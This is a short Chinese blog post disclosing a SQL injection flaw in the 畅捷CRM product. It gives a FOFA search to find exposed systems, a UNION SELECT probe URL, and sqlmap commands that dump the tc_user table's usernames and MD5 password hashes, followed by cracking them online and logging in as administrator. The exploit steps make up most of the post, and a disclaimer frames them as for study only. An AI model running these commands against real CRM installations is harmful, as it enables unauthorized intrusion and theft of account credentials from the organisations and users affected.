【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码
【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码
迪哥讲事 2023-09-24 20:17
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
畅捷CRM g
et_userspace.php文件中 site_id参数存在SQL注入漏洞
二、影响范围
畅捷CRM
三、fofa查询
title="畅捷CRM"
四、漏洞检测
直接浏览器访问:
http://ip:port/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)--
返回结果如下,则存在SQL注入漏洞
批量监测
五、漏洞利用
使用SQLmap进行漏洞利用
获取当前数据库名称
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch --current-db
获取当前数据库表名
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch --dbms=mysql -D crmsaas_plus --tables
获取系统当前用户名密码, 密码都是md5 加密的,简单的密码会自动爆破出来。
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch -D crmsaas_plus -T tc_user -C login_name,login_password -dump
可以使用https://cmd5.com/ 对加密的密码解密
获取账号密码后成功登录
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券
),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款